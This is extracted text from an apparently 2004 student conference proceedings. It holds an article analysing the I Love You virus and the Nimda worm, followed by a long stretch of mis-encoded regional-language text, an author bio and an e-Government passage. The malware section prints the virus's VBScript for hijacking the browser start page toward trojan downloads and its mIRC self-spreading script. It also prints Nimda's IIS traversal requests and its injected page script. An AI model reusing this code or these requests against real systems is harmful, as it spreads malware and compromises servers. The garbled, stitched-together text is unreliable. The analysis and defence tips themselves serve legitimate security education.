The I Love You virus is a little more bulky so I chose not to include the entire script here Youcan download all of the I Love You source from httpwwwpacketstormsecurityorgviral-dblove-letter-sourcetxt

What is interesting to note about the I Love You virus is that it randomly changed the usersdefault Web browser homepage to one of four locations as seen here by the code

num = Int((4 Rnd) + 1)if num = 1 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~young1sHJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYTWIN-BUGSFIXexe

elseif num = 2 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~angelcatskladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIXexe

elseif num = 3 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~koichijf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3VbvgWIN-BUGSFIXexe

elseif num = 4 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~chusdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjgWIN-BUGSFIXexe

end ifend if

Known Malware ExploitationAbhishek Bhuyan

KIIT Student

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 19: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

15

E-Government success requires changinghow government works how it deals withinformation how officials view their jobs andinteract with the public Achieving e-Government success also requires activepartnerships between government citizens andthe private sector The e-Government processneeds continuous input and feedback from thecustomers the public businesses andofficials who use e-Government services Theirvoices and ideas are essential for making e-Government work When implemented well e-Government is a participatory process

The study group also classified tenremarkable questions for e-Governmentinitiatives in the developing world and if wedefine the entire question in a proper way wewould understand basic problems in e-Government implementation and how we canachieve faster growth in areas of e-Governmentby selecting the right citizen centric services

1 Why are we pursuing e-Government2 Do we have a clear vision and priorities

for e-Government3 What kind of e-Government are we ready

for4 Is there enough political will to lead the

e-Government effort5 Are we selecting e-Government projects

in the best way6 How should we plan and manage e-

Government projects7 How will we overcome resistance from

within the government8 How will we measure and communicate

progress And how will we know if weare failing

9 What should our relationship be with theprivate sector

10 How can e-Government improve citizensparticipation in public affairs

These questions itself give a betterunderstanding and if we define it practicallyaccording to the e-Government project then wecan be champions in e-Government

Above all the government should make aperformance-based index for their humanresources so that in a changed environment thegovernment can measure the performance ofofficersemployees and give them rewardsincentives and promotions on betterperformance Simultaneously the governmentwill also give proper training for a new ITenvironment and new IT solutions for betterservices delivered with KnowledgeManagement Unless and until these criteria arenot used by Government Citizens cant get on-time government services either online or offline

